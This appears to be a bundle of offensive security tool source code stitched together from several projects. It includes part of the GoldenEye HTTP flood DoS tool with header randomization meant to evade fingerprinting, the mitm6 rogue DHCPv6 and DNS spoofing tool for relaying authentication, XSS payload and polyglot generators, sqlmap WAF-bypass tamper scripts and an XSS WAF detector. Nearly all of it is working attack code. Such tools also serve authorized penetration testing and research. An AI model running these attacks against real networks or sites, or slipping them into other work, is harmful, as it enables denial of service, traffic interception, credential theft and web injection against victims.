        for conn in self.socks:
            try:
                conn.close()
            except:
                pass  # silently ignore

    def createPayload(self):
        req_url, headers = self.generateData()

        random_keys = list(headers.keys())
        random.shuffle(random_keys)
        random_headers = {}

        for header_name in random_keys:
            random_headers[header_name] = headers[header_name]

        return (req_url, random_headers)

    def generateQueryString(self, ammount=1):
        queryString = []

        for i in range(ammount):
            key = self.buildblock(random.randint(3, 10))
            value = self.buildblock(random.randint(3, 20))
            element = "{0}={1}".format(key, value)
            queryString.append(element)

        return "&".join(queryString)

    def generateData(self):
        param_joiner = "?"

        if len(self.url) == 0:
            self.url = "/"

        if self.url.count("?") > 0:
            param_joiner = "&"

        request_url = self.generateRequestUrl(param_joiner)

        http_headers = self.generateRandomHeaders()

        return (request_url, http_headers)

    def generateRequestUrl(self, param_joiner="?"):
        return self.url + param_joiner + self.generateQueryString(random.randint(1, 5))

    def getUserAgent(self):
        if self.useragents:
            return random.choice(self.useragents)

        # Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

        ## Mozilla Version
        mozilla_version = (  # hardcoded for now, almost every browser is on this version except IE6
            "Mozilla/5.0"
        )

        ## System And Browser Information
        # Choose random OS
        os = USER_AGENT_PARTS["os"][random.choice(list(USER_AGENT_PARTS["os"].keys()))]
        os_name = random.choice(os["name"])
        sysinfo = os_name

        # Choose random platform
        platform = USER_AGENT_PARTS["platform"][
            random.choice(list(USER_AGENT_PARTS["platform"].keys()))
        ]

        # Get Browser Information if available
        if "browser_info" in platform and platform["browser_info"]:
            browser = platform["browser_info"]

            browser_string = random.choice(browser["name"])

            if "ext_pre" in browser:
                browser_string = "%s; %s" % (
                    random.choice(browser["ext_pre"]),
                    browser_string,
                )

            sysinfo = "%s; %s" % (browser_string, sysinfo)

            if "ext_post" in browser:
                sysinfo = "%s; %s" % (sysinfo, random.choice(browser["ext_post"]))

        if "ext" in os and os["ext"]:
            sysinfo = "%s; %s" % (sysinfo, random.choice(os["ext"]))

        ua_string = "%s (%s)" % (mozilla_version, sysinfo)

        if "name" in platform and platform["name"]:
            ua_string = "%s %s" % (ua_string, random.choice(platform["name"]))

        if "details" in platform and platform["details"]:
            ua_string = "%s (%s)" % (
                ua_string,
                (
                    random.choice(platform["details"])
                    if len(platform["details"]) > 1
                    else platform["details"][0]
                ),
            )

        if "extensions" in platform and platform["extensions"]:
            ua_string = "%s %s" % (ua_string, random.choice(platform["extensions"]))

        return ua_string

    def generateRandomHeaders(self):
        # Random no-cache entries
        noCacheDirectives = ["no-cache", "max-age=0"]
        random.shuffle(noCacheDirectives)
        nrNoCache = random.randint(1, (len(noCacheDirectives) - 1))
        noCache = ", ".join(noCacheDirectives[:nrNoCache])

        # Random accept encoding
        acceptEncoding = ["''", "*", "identity", "gzip", "deflate"]
        random.shuffle(acceptEncoding)
        nrEncodings = random.randint(1, int(len(acceptEncoding) / 2))
        roundEncodings = acceptEncoding[:nrEncodings]

        http_headers = {
            "User-Agent": self.getUserAgent(),
            "Cache-Control": noCache,
            "Accept-Encoding": ", ".join(roundEncodings),
            "Connection": "keep-alive",
            "Keep-Alive": random.randint(1, 1000),
            "Host": self.host,
        }

        # Randomly-added headers
        # These headers are optional and are
        # randomly sent thus making the
        # header count random and unfingerprintable
        if random.randrange(2) == 0:
            # Random accept-charset
            acceptCharset = [
                "ISO-8859-1",
                "utf-8",
                "Windows-1251",
                "ISO-8859-2",
                "ISO-8859-15",
            ]
            random.shuffle(acceptCharset)
            http_headers["Accept-Charset"] = "{0},{1};q={2},*;q={3}".format(
                acceptCharset[0],
                acceptCharset[1],
                round(random.random(), 1),
                round(random.random(), 1),
            )

        if random.randrange(2) == 0:
            # Random Referer
            url_part = self.buildblock(random.randint(5, 10))

            random_referer = random.choice(self.referers) + url_part

            if random.randrange(2) == 0:
                random_referer = (
                    random_referer
                    + "?"
                    + self.generateQueryString(random.randint(1, 10))
                )

            http_headers["Referer"] = random_referer

        if random.randrange(2) == 0:
            # Random Content-Trype
            http_headers["Content-Type"] = random.choice(
                ["multipart/form-data", "application/x-url-encoded"]
            )

        if random.randrange(2) == 0:
            # Random Cookie
            http_headers["Cookie"] = self.generateQueryString(random.randint(1, 5))

        return http_headers

    # Housekeeping
    def stop(self):
        self.runnable = False
        self.closeConnections()
        self.terminate()

    # Counter Functions
    def incCounter(self):
        try:
            self.counter[0] += 1
        except Exception:
            pass

    def incFailed(self):
        try:
            self.counter[1] += 1
        except Exception:
            pass


####

####
# Other Functions
####


def usage():
    print()
    print(
        "-----------------------------------------------------------------------------------------------------------"
    )
    print()
    print()
    print(" USAGE: ./goldeneye.py <url> [OPTIONS]")
    print()
    print(" OPTIONS:")
    print("\t Flag\t\t\tDescription\t\t\t\t\t\tDefault")
    print(
        "\t -u, --useragents\tFile with user-agents to use\t\t\t\t(default: randomly"
        " generated)"
    )
    print(
        "\t -w, --workers\t\tNumber of concurrent workers\t\t\t\t(default: {0})".format(
            DEFAULT_WORKERS
        )
    )
    print(
        "\t -s, --sockets\t\tNumber of concurrent sockets\t\t\t\t(default: {0})".format(
            DEFAULT_SOCKETS
        )
    )
    print(
        "\t -m, --method\t\tHTTP Method to use 'get' or 'post'  or"
        " 'random'\t\t(default: get)"
    )
    print("\t -n, --nosslcheck\tDo not verify SSL Certificate\t\t\t\t(default: True)")
    print(
        "\t -d, --debug\t\tEnable Debug Mode [more verbose output]\t\t\t(default:"
        " False)"
    )
    print("\t -h, --help\t\tShows this help")
    print()
    print(
        "-----------------------------------------------------------------------------------------------------------"
    )


def error(msg):
    # print help information and exit:
    sys.stderr.write(str(msg + "\n"))
    usage()
    sys.exit(2)


####
# Main
####


def main():
    try:
        if len(sys.argv) < 2:
            error("Please supply at least the URL")

        url = sys.argv[1]

        if url == "-h":
            usage()
            sys.exit()

        if url[0:4].lower() != "http":
            error("Invalid URL supplied")

        if url == None:
            error("No URL supplied")

        opts, args = getopt.getopt(
            sys.argv[2:],
            "ndhw:s:m:u:",
            [
                "nosslcheck",
                "debug",
                "help",
                "workers",
                "sockets",
                "method",
                "useragents",
            ],
        )

        workers = DEFAULT_WORKERS
        socks = DEFAULT_SOCKETS
        method = METHOD_GET

        uas_file = None
        useragents = []

        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit()
            elif o in ("-u", "--useragents"):
                uas_file = a
            elif o in ("-s", "--sockets"):
                socks = int(a)
            elif o in ("-w", "--workers"):
                workers = int(a)
            elif o in ("-d", "--debug"):
                global DEBUG
                DEBUG = True
            elif o in ("-n", "--nosslcheck"):
                global SSLVERIFY
                SSLVERIFY = False
            elif o in ("-m", "--method"):
                if a in (METHOD_GET, METHOD_POST, METHOD_RAND):
                    method = a
                else:
                    error("method {0} is invalid".format(a))
            else:
                error("option '" + o + "' doesn't exists")

        if uas_file:
            try:
                with open(uas_file) as f:
                    useragents = f.readlines()
            except EnvironmentError:
                error("cannot read file {0}".format(uas_file))

        goldeneye = GoldenEye(url)
        goldeneye.useragents = useragents
        goldeneye.nr_workers = workers
        goldeneye.method = method
        goldeneye.nr_sockets = socks

        goldeneye.fire()

    except getopt.GetoptError as err:
        # print help information and exit:
        sys.stderr.write(str(err))
        usage()
        sys.exit(2)


if __name__ == "__main__":
    main()



from .arp_spoofing import ARPSpoof
from .ddos_attack import DDoSAttack
from .dns_spoofer import DNSSpoofer
from .dos_attack import DoSAttack
from .mitm_attack import MITMAttack
from .sql_injection import SQLInjectionAttack
from .xss_attack import XSSAttack
from .network_spoofer import NetworkMonitor
from .website_extractor import WebsiteExtractor



from __future__ import unicode_literals
from scapy.all import sniff, ls, ARP, IPv6, DNS, DNSRR, Ether, conf, IP, UDP, DNSRRSOA
from scapy.config import conf as config
from twisted.internet import reactor
from twisted.internet.protocol import ProcessProtocol, DatagramProtocol
from scapy.layers.dhcp6 import (
    DHCP6OptClientFQDN,
    DHCP6OptClientId,
    DHCP6OptDNSDomains,
    DHCP6OptDNSServers,
    DHCP6OptIAAddress,
    DHCP6OptIA_NA,
    DHCP6OptServerId,
    DHCP6_Advertise,
    DHCP6_Renew,
    DHCP6_Reply,
    DHCP6_Request,
    DHCP6_Solicit,
    DUID_LL,
)
from scapy.layers.inet6 import ICMPv6ND_RA
from scapy.sendrecv import sendp
from twisted.internet import task, threads
from builtins import str
import json
import random
import ipaddress
import netifaces
import sys
import argparse
import socket
import builtins

# Globals
pcdict = {}
arptable = {}
try:
    with open("arp.cache", "r") as arpcache:
        arptable = json.load(arpcache)
except IOError:
    pass


# Config class - contains runtime config
class Config(object):
    def __init__(self, args):
        # IP autodiscovery / config override
        if args.interface is None:
            self.dgw = netifaces.gateways()["default"]
            self.default_if = self.dgw[netifaces.AF_INET][1]
        else:
            self.default_if = args.interface
        if args.ipv4 is None:
            self.v4addr = netifaces.ifaddresses(self.default_if)[netifaces.AF_INET][0][
                "addr"
            ]
        else:
            self.v4addr = args.ipv4
        if args.ipv6 is None:
            try:
                self.v6addr = None
                addrs = netifaces.ifaddresses(self.default_if)[netifaces.AF_INET6]
                for addr in addrs:
                    if "fe80::" in addr["addr"]:
                        self.v6addr = addr["addr"]
            except KeyError:
                self.v6addr = None
            if not self.v6addr:
                print(
                    "Error: The interface {0} does not have an IPv6 link-local address"
                    " assigned. Make sure IPv6 is activated on this interface.".format(
                        self.default_if
                    )
                )
                sys.exit(1)
        else:
            self.v6addr = args.ipv6
        if args.mac is None:
            self.macaddr = netifaces.ifaddresses(self.default_if)[netifaces.AF_LINK][0][
                "addr"
            ]
        else:
            self.macaddr = args.mac

        if "%" in self.v6addr:
            self.v6addr = self.v6addr[: self.v6addr.index("%")]
        # End IP autodiscovery

        # This is partly static, partly filled in from the autodiscovery above
        self.ipv6prefix = "fe80::"  # link-local
        self.selfaddr = self.v6addr
        self.selfmac = self.macaddr
        self.ipv6cidr = "64"
        self.selfipv4 = self.v4addr
        self.selfduid = DUID_LL(lladdr=self.macaddr)
        self.selfptr = ipaddress.ip_address(str(self.selfaddr)).reverse_pointer + "."
        self.ipv6noaddr = random.randint(1, 9999)
        self.ipv6noaddrc = 1
        # Relay target
        if args.relay:
            self.relay = args.relay.lower()
        else:
            self.relay = None
        # DNS allowlist / blocklist options
        self.dns_allowlist = [d.lower() for d in args.domain]
        self.dns_blocklist = [d.lower() for d in args.blocklist]
        # Hostname (DHCPv6 FQDN) allowlist / blocklist options
        self.host_allowlist = [d.lower() for d in args.host_allowlist]
        self.host_blocklist = [d.lower() for d in args.host_blocklist]
        # Should DHCPv6 queries that do not specify a FQDN be ignored?
        self.ignore_nofqdn = args.ignore_nofqdn
        # Local domain to advertise
        # If no localdomain is specified, use the first dnsdomain
        if args.localdomain is None:
            try:
                self.localdomain = args.domain[0]
            except IndexError:
                self.localdomain = None
        else:
            self.localdomain = args.localdomain.lower()

        self.debug = args.debug
        self.verbose = args.verbose
        # End of config


# Target class - defines the host we are targetting
class Target(object):
    def __init__(self, mac, host, ipv4=None):
        self.mac = mac
        # Make sure the host is in unicode
        try:
            self.host = host.decode("utf-8")
        except builtins.AttributeError:
            # Already in unicode
            self.host = host
        if ipv4 is not None:
            self.ipv4 = ipv4
        else:
            # Set the IP from the arptable if it is there
            try:
                self.ipv4 = arptable[mac]
            except KeyError:
                self.ipv4 = ""

    def __str__(self):
        return "mac=%s host=%s ipv4=%s" % (self.mac, str(self.host), self.ipv4)

    def __repr__(self):
        return "<Target %s>" % self.__str__()


def get_fqdn(dhcp6packet):
    try:
        fqdn = dhcp6packet[DHCP6OptClientFQDN].fqdn
        if fqdn[-1] == ".":
            return fqdn[:-1]
        else:
            return fqdn
    # if not specified
    except KeyError:
        return ""


def send_dhcp_advertise(p, basep, target):
    global ipv6noaddrc
    resp = (
        Ether(dst=basep.src)
        / IPv6(src=config.selfaddr, dst=basep[IPv6].src)
        / UDP(sport=547, dport=546)
    )  # base packet
    resp /= DHCP6_Advertise(trid=p.trid)
    # resp /= DHCP6OptPref(prefval = 255)
    resp /= DHCP6OptClientId(duid=p[DHCP6OptClientId].duid)
    resp /= DHCP6OptServerId(duid=config.selfduid)
    resp /= DHCP6OptDNSServers(dnsservers=[config.selfaddr])
    if config.localdomain:
        resp /= DHCP6OptDNSDomains(dnsdomains=[config.localdomain])
    if target.ipv4 != "":
        addr = config.ipv6prefix + target.ipv4.replace(".", ":")
    else:
        addr = config.ipv6prefix + "%d:%d" % (config.ipv6noaddr, config.ipv6noaddrc)
        config.ipv6noaddrc += 1
    opt = DHCP6OptIAAddress(preflft=300, validlft=300, addr=addr)
    resp /= DHCP6OptIA_NA(ianaopts=[opt], T1=200, T2=250, iaid=p[DHCP6OptIA_NA].iaid)
    sendp(resp, iface=config.default_if, verbose=False)


def send_dhcp_reply(p, basep):
    resp = (
        Ether(dst=basep.src)
        / IPv6(src=config.selfaddr, dst=basep[IPv6].src)
        / UDP(sport=547, dport=546)
    )  # base packet
    resp /= DHCP6_Reply(trid=p.trid)
    # resp /= DHCP6OptPref(prefval = 255)
    resp /= DHCP6OptClientId(duid=p[DHCP6OptClientId].duid)
    resp /= DHCP6OptServerId(duid=config.selfduid)
    resp /= DHCP6OptDNSServers(dnsservers=[config.selfaddr])
    if config.localdomain:
        resp /= DHCP6OptDNSDomains(dnsdomains=[config.localdomain])
    try:
        opt = p[DHCP6OptIAAddress]
        resp /= DHCP6OptIA_NA(
            ianaopts=[opt], T1=200, T2=250, iaid=p[DHCP6OptIA_NA].iaid
        )
        sendp(resp, iface=config.default_if, verbose=False)
    except IndexError:
        # Some hosts don't send back this layer for some reason, ignore those
        if config.debug or config.verbose:
            print(
                "Ignoring DHCPv6 packet from %s: Missing DHCP6OptIAAddress layer"
                % basep.src
            )


def send_dns_reply(p):
    if IPv6 in p:
        ip = p[IPv6]
        resp = (
            Ether(dst=p.src, src=p.dst)
            / IPv6(dst=ip.src, src=ip.dst)
            / UDP(dport=ip.sport, sport=ip.dport)
        )
    else:
        ip = p[IP]
        resp = (
            Ether(dst=p.src, src=p.dst)
            / IP(dst=ip.src, src=ip.dst)
            / UDP(dport=ip.sport, sport=ip.dport)
        )
    dns = p[DNS]
    # only reply to IN, and to messages that dont contain answers
    if dns.qd.qclass != 1 or dns.qr != 0:
        return
    # Make sure the requested name is in unicode here
    reqname = dns.qd.qname.decode()
    # A query
    if dns.qd.qtype == 1:
        rdata = config.selfipv4
    # AAAA query
    elif dns.qd.qtype == 28:
        rdata = config.selfaddr
    # PTR query
    elif dns.qd.qtype == 12:
        # To reply for PTR requests for our own hostname
        # comment the return statement
        return
        if reqname == config.selfptr:
            # We reply with attacker.domain
            rdata = "attacker.%s" % config.localdomain
        else:
            return
    # SOA query
    elif dns.qd.qtype == 6 and config.relay:
        if dns.opcode == 5:
            if config.verbose or config.debug:
                print("Dynamic update found, refusing it to trigger auth")
            resp /= DNS(id=dns.id, qr=1, qd=dns.qd, ns=dns.ns, opcode=5, rcode=5)
            sendp(resp, verbose=False)
        else:
            rdata = config.selfaddr
            resp /= DNS(
                id=dns.id,
                qr=1,
                qd=dns.qd,
                nscount=1,
                arcount=1,
                ancount=1,
                an=DNSRRSOA(
                    rrname=dns.qd.qname,
                    ttl=100,
                    mname="%s." % config.relay,
                    rname="mitm6",
                    serial=1337,
                    type=dns.qd.qtype,
                ),
                ns=DNSRR(rrname=dns.qd.qname, ttl=100, rdata=config.relay, type=2),
                ar=DNSRR(
                    rrname=config.relay,
                    type=1,
                    rclass=1,
                    ttl=300,
                    rdata=config.selfipv4,
                ),
            )
            sendp(resp, verbose=False)
            if config.verbose or config.debug:
                print("Sent SOA reply")
        return
    # Not handled
    else:
        return
    if should_spoof_dns(reqname):
        resp /= DNS(
            id=dns.id,
            qr=1,
            qd=dns.qd,
            an=DNSRR(rrname=dns.qd.qname, ttl=100, rdata=rdata, type=dns.qd.qtype),
        )
        try:
            sendp(resp, iface=config.default_if, verbose=False)
        except socket.error as e:
            print("Error sending spoofed DNS")
            print(e)
            if config.debug:
                ls(resp)
        print("Sent spoofed reply for %s to %s" % (reqname, ip.src))
    else:
        if config.verbose or config.debug:
            print("Ignored query for %s from %s" % (reqname, ip.src))


# Helper function to check whether any element in the list "matches" value
def matches_list(value, target_list):
    testvalue = value.lower()
    for test in target_list:
        if test in testvalue:
            return True
    return False


# Should we spoof the queried name?
def should_spoof_dns(dnsname):
    # If allowlist exists, host should match
    if config.dns_allowlist and not matches_list(dnsname, config.dns_allowlist):
        return False
    # If there are any entries in the blocklist, make sure it doesnt match against any
    if matches_list(dnsname, config.dns_blocklist):
        return False
    return True


# Should we reply to this host?
def should_spoof_dhcpv6(fqdn):
    # If there is no FQDN specified, check if we should reply to empty ones
    if not fqdn:
        return not config.ignore_nofqdn
    # If allowlist exists, host should match
    if config.host_allowlist and not matches_list(fqdn, config.host_allowlist):
        if config.debug:
            print("Ignoring DHCPv6 packet from %s: FQDN not in allowlist " % fqdn)
        return False
    # If there are any entries in the blocklist, make sure it doesnt match against any
    if matches_list(fqdn, config.host_blocklist):
        if config.debug:
            print("Ignoring DHCPv6 packet from %s: FQDN matches blocklist " % fqdn)
        return False
    return True


# Get a target object if it exists, otherwise, create it
def get_target(p):
    mac = p.src
    # If it exists, return it
    try:
        return pcdict[mac]
    except KeyError:
        try:
            fqdn = get_fqdn(p)
        except IndexError:
            fqdn = ""
        pcdict[mac] = Target(mac, fqdn)
        return pcdict[mac]


# Parse a packet
def parsepacket(p):
    if DHCP6_Solicit in p:
        target = get_target(p)
        if should_spoof_dhcpv6(target.host):
            send_dhcp_advertise(p[DHCP6_Solicit], p, target)
    if DHCP6_Request in p:
        target = get_target(p)
        if p[DHCP6OptServerId].duid == config.selfduid and should_spoof_dhcpv6(
            target.host
        ):
            send_dhcp_reply(p[DHCP6_Request], p)
            print(
                "IPv6 address %s is now assigned to %s"
                % (p[DHCP6OptIA_NA].ianaopts[0].addr, pcdict[p.src])
            )
    if DHCP6_Renew in p:
        target = get_target(p)
        if p[DHCP6OptServerId].duid == config.selfduid and should_spoof_dhcpv6(
            target.host
        ):
            send_dhcp_reply(p[DHCP6_Renew], p)
            print("Renew reply sent to %s" % p[DHCP6OptIA_NA].ianaopts[0].addr)
    if ARP in p:
        arpp = p[ARP]
        if arpp.op == 2:
            # Arp is-at package, update internal arp table
            arptable[arpp.hwsrc] = arpp.psrc
    if DNS in p:
        if p.dst == config.selfmac:
            send_dns_reply(p)


def setupFakeDns():
    # We bind to port 53 to prevent ICMP port unreachable packets being sent
    # actual responses are sent by scapy
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    fulladdr = config.v6addr + "%" + config.default_if
    addrinfo = socket.getaddrinfo(fulladdr, 53, socket.AF_INET6, socket.SOCK_DGRAM)
    sock.bind(addrinfo[0][4])
    sock.setblocking(0)
    # Bind IPv4 as well
    sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    fulladdr = config.v4addr
    addrinfo = socket.getaddrinfo(fulladdr, 53, socket.AF_INET, socket.SOCK_DGRAM)
    sock2.bind(addrinfo[0][4])
    sock2.setblocking(0)
    return sock, sock2


def send_ra():
    # Send a Router Advertisement with the "managed" and "other" flag set, which should cause clients to use DHCPv6 and ask us for addresses
    # routerlifetime is set to 0 in order to not adverise ourself as a gateway (RFC4861, section 4.2)
    p = (
        Ether(src=config.selfmac, dst="33:33:00:00:00:01")
        / IPv6(src=config.selfaddr, dst="ff02::1")
        / ICMPv6ND_RA(M=1, O=1, routerlifetime=0)
    )
    sendp(p, iface=config.default_if, verbose=False)


# Whether packet capturing should stop
def should_stop(_):
    return not reactor.running


def shutdownnotice():
    print("")
    print("Shutting down packet capture after next packet...")
    # print(pcdict)
    # print(arptable)
    with open("arp.cache", "w") as arpcache:
        arpcache.write(json.dumps(arptable))


def print_err(failure):
    print(
        "An error occurred while sending a packet: %s\nNote that root privileges are"
        " required to run mitm6" % failure.getErrorMessage()
    )


def main():
    global config
    parser = argparse.ArgumentParser(
        description=(
            "mitm6 - pwning IPv4 via IPv6\nFor help or reporting issues, visit"
            " https://github.com/dirkjanm/mitm6"
        ),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "-i",
        "--interface",
        type=str,
        metavar="INTERFACE",
        help="Interface to use (default: autodetect)",
    )
    parser.add_argument(
        "-l",
        "--localdomain",
        type=str,
        metavar="LOCALDOMAIN",
        help="Domain name to use as DNS search domain (default: use first DNS domain)",
    )
    parser.add_argument(
        "-4",
        "--ipv4",
        type=str,
        metavar="ADDRESS",
        help="IPv4 address to send packets from (default: autodetect)",
    )
    parser.add_argument(
        "-6",
        "--ipv6",
        type=str,
        metavar="ADDRESS",
        help="IPv6 link-local address to send packets from (default: autodetect)",
    )
    parser.add_argument(
        "-m",
        "--mac",
        type=str,
        metavar="ADDRESS",
        help=(
            "Custom mac address - probably breaks stuff (default: mac of selected"
            " interface)"
        ),
    )
    parser.add_argument(
        "-a",
        "--no-ra",
        action="store_true",
        help=(
            "Do not advertise ourselves (useful for networks which detect rogue Router"
            " Advertisements)"
        ),
    )
    parser.add_argument(
        "-r",
        "--relay",
        type=str,
        metavar="TARGET",
        help=(
            "Authentication relay target, will be used as fake DNS server hostname to"
            " trigger Kerberos auth"
        ),
    )
    parser.add_argument(
        "-v", "--verbose", action="store_true", help="Show verbose information"
    )
    parser.add_argument("--debug", action="store_true", help="Show debug information")

    filtergroup = parser.add_argument_group("Filtering options")
    filtergroup.add_argument(
        "-d",
        "--domain",
        action="append",
        default=[],
        metavar="DOMAIN",
        help=(
            "Domain name to filter DNS queries on (Allowlist principle, multiple can be"
            " specified.)"
        ),
    )
    filtergroup.add_argument(
        "-b",
        "--blocklist",
        "--blacklist",
        action="append",
        default=[],
        metavar="DOMAIN",
        help=(
            "Domain name to filter DNS queries on (Blocklist principle, multiple can be"
            " specified.)"
        ),
    )
    filtergroup.add_argument(
        "-hw",
        "-ha",
        "--host-allowlist",
        "--host-whitelist",
        action="append",
        default=[],
        metavar="DOMAIN",
        help=(
            "Hostname (FQDN) to filter DHCPv6 queries on (Allowlist principle, multiple"
            " can be specified.)"
        ),
    )
    filtergroup.add_argument(
        "-hb",
        "--host-blocklist",
        "--host-blacklist",
        action="append",
        default=[],
        metavar="DOMAIN",
        help=(
            "Hostname (FQDN) to filter DHCPv6 queries on (Blocklist principle, multiple"
            " can be specified.)"
        ),
    )
    filtergroup.add_argument(
        "--ignore-nofqdn",
        action="store_true",
        help=(
            "Ignore DHCPv6 queries that do not contain the Fully Qualified Domain Name"
            " (FQDN) option."
        ),
    )

    args = parser.parse_args()
    config = Config(args)

    print("Starting mitm6 using the following configuration:")
    print("Primary adapter: %s [%s]" % (config.default_if, config.selfmac))
    print("IPv4 address: %s" % config.selfipv4)
    print("IPv6 address: %s" % config.selfaddr)
    if config.localdomain is not None:
        print("DNS local search domain: %s" % config.localdomain)
    if not config.dns_allowlist and not config.dns_blocklist:
        print(
            "Warning: Not filtering on any domain, mitm6 will reply to all DNS"
            " queries.\nUnless this is what you want, specify at least one domain"
            " with -d"
        )
    else:
        if not config.dns_allowlist:
            print("DNS allowlist: *")
        else:
            print("DNS allowlist: %s" % ", ".join(config.dns_allowlist))
            if (
                config.relay
                and len(
                    [
                        matching
                        for matching in config.dns_allowlist
                        if matching in config.relay
                    ]
                )
                == 0
            ):
                print(
                    "Warning: Relay target is specified but the DNS query allowlist"
                    " does not contain the target name."
                )
        if config.dns_blocklist:
            print("DNS blocklist: %s" % ", ".join(config.dns_blocklist))
    if config.host_allowlist:
        print("Hostname allowlist: %s" % ", ".join(config.host_allowlist))
    if config.host_blocklist:
        print("Hostname blocklist: %s" % ", ".join(config.host_blocklist))

    # Main packet capture thread
    d = threads.deferToThread(
        sniff,
        iface=config.default_if,
        filter="ip6 proto \\udp or arp or udp port 53",
        prn=lambda x: reactor.callFromThread(parsepacket, x),
        stop_filter=should_stop,
    )
    d.addErrback(print_err)

    # RA loop
    if not args.no_ra:
        loop = task.LoopingCall(send_ra)
        d = loop.start(30.0)
        d.addErrback(print_err)

    # Set up DNS
    dnssock, dnssock2 = setupFakeDns()
    reactor.adoptDatagramPort(dnssock.fileno(), socket.AF_INET6, DatagramProtocol())
    reactor.adoptDatagramPort(dnssock2.fileno(), socket.AF_INET, DatagramProtocol())

    reactor.addSystemEventTrigger("before", "shutdown", shutdownnotice)
    reactor.run()


if __name__ == "__main__":
    main()



import re
import random


__PRIORITY__ = 1


def tamper(script):
    functions = (
        "[{}].find(confirm)".format(random.randint(1, 9)),
        "confirm()",
        "(confirm)()",
        "co\u006efir\u006d()",
        "(prompt)``",
        "a=prompt,a()",
    )
    searcher = re.compile("=")
    retval = []
    for c in script:
        if searcher.search(c) is not None:
            c = "={};{}".format(random.choice(functions), c)
        retval.append(c)
    return "".join(retval)



import random


def generate_polyglot():
    """Generate a polyglot script."""

    retval = ""
    starts = (
        "\"'>>javascript:-->",
        "<img//src='javascript://;alert()/>",
        "javascript: onclick=",
        "'\">><",
        "--><button javascript:/*",
        "/</title>--<button/>",
    )
    close_tags = (
        "</textarea></html></script></style>",
        "<xanxss></decoy></style></textarea>--></style>",
        "/<decoy></style-->/*</textarea>",
    )
    space_fillers = (
        "`-->",
        "'/*/*/*",
        "*//>",
        "//-->//",
        "-->//'*/",
        "/*``-->",
        '"-->//*/',
        "'String.fromCharCode(88,83,83)-->`/*",
    )
    tag_starters = (
        "<button src=`/*<script>",
        "<script><textarea><decoy><xanxss>",
        "<marquee<script>>",
        "<xanxss><script>",
    )
    prompts = (
        "confirm()",
        "(confirm)()",
        "co\u006efir\u006d()",
        "(prompt)``",
        "alert()",
    )
    script = [
        random.choice(starts),
        " <script>alert();</script>",
        random.choice(tag_starters),
        random.choice(prompts),
        random.choice(close_tags),
        " </script> ",
    ]
    script = " ".join(script)
    for c in script:
        if c == " " or c.isspace():
            c = random.choice(space_fillers)
        retval += c
    return retval



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'LICENSE' for copying permission."""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replaces AND and OR logical operators with their symbolic counterparts
    (&& and ||)

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    retVal = payload

    if payload:
        retVal = re.sub(
            r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)
        )

    return retVal



#!/usr/bin/env python
"""Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/) See the file
'doc/COPYING' for copying permission."""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE
    (C) END' counterpart.

    Requirement:
        * MySQL
        * SQLite (possibly)
        * SAP MaxDB (possibly)

    Tested against:
        * MySQL 5.0 and 5.5

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that filter the IF() functions

    >>> tamper('IF(1, 2, 3)')
    'CASE WHEN (1) THEN (2) ELSE (3) END'
    >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)')
    'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END'
    """

    if payload and payload.find("IF") > -1:
        while payload.find("IF(") > -1:
            index = payload.find("IF(")
            depth = 1
            commas, end = [], None

            for i in xrange(index + len("IF("), len(payload)):
                if depth == 1 and payload[i] == ",":
                    commas.append(i)

                elif depth == 1 and payload[i] == ")":
                    end = i
                    break

                elif payload[i] == "(":
                    depth += 1

                elif payload[i] == ")":
                    depth -= 1

            if len(commas) == 2 and end:
                a = payload[index + len("IF(") : commas[0]].strip("()")
                b = payload[commas[0] + 1 : commas[1]].lstrip().strip("()")
                c = payload[commas[1] + 1 : end].lstrip().strip("()")
                newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c)
                payload = payload[:index] + newVal + payload[end + 1 :]
            else:
                break

    return payload



import json
import re
import sys

from core.requester import requester
from core.log import setup_logger

logger = setup_logger(__name__)


def wafDetector(url, params, headers, GET, delay, timeout):
    with open(sys.path[0] + "/db/wafSignatures.json", "r") as file:
        wafSignatures = json.load(file)
    # a payload which is noisy enough to provoke the WAF
    noise = '<script>alert("XSS")</script>'
    params["xss"] = noise
    # Opens the noise injected payload
    response = requester(url, params, headers, GET, delay, timeout)
    page = response.text
    code = str(response.status_code)
    headers = str(response.headers)
    logger.debug("Waf Detector code: {}".format(code))
    logger.debug_json("Waf Detector headers:", response.headers)

    if int(code) >= 400:
        bestMatch = [0, None]
        for wafName, wafSignature in wafSignatures.items():
            score = 0
            pageSign = wafSignature["page"]
            codeSign = wafSignature["code"]
            headersSign = wafSignature["headers"]
            if pageSign:
                if re.search(pageSign, page, re.I):
                    score += 1
            if codeSign:
                if re.search(codeSign, code, re.I):
                    score += 0.5  # increase the overall score by a smaller amount because http codes aren't strong indicators
            if headersSign:
                if re.search(headersSign, headers, re.I):
                    score += 1
            # if the overall score of the waf is higher than the previous one
            if score > bestMatch[0]:
                del bestMatch[:]  # delete the previous one
                bestMatch.extend([score, wafName])  # and add this one
        if bestMatch[0] != 0:
            return bestMatch[1]
        else:
            return None
    else:
        return None



changes = """Negligible DOM XSS false positives;x10 faster crawling"""
globalVariables = (
    {}
)  # it holds variables during runtime for collaboration across modules

defaultEditor = "nano"
blindPayload = ""  # your blind XSS payload
xsschecker = "v3dm0s"  # A non malicious string to check for reflections and stuff

#  More information on adding proxies: http://docs.python-requests.org/en/master/user/advanced/#proxies
proxies = {"http": "http://0.0.0.0:8080", "https": "http://0.0.0.0:8080"}

minEfficiency = 90  # payloads below this efficiency will not be displayed

delay = 0  # default delay between http requests
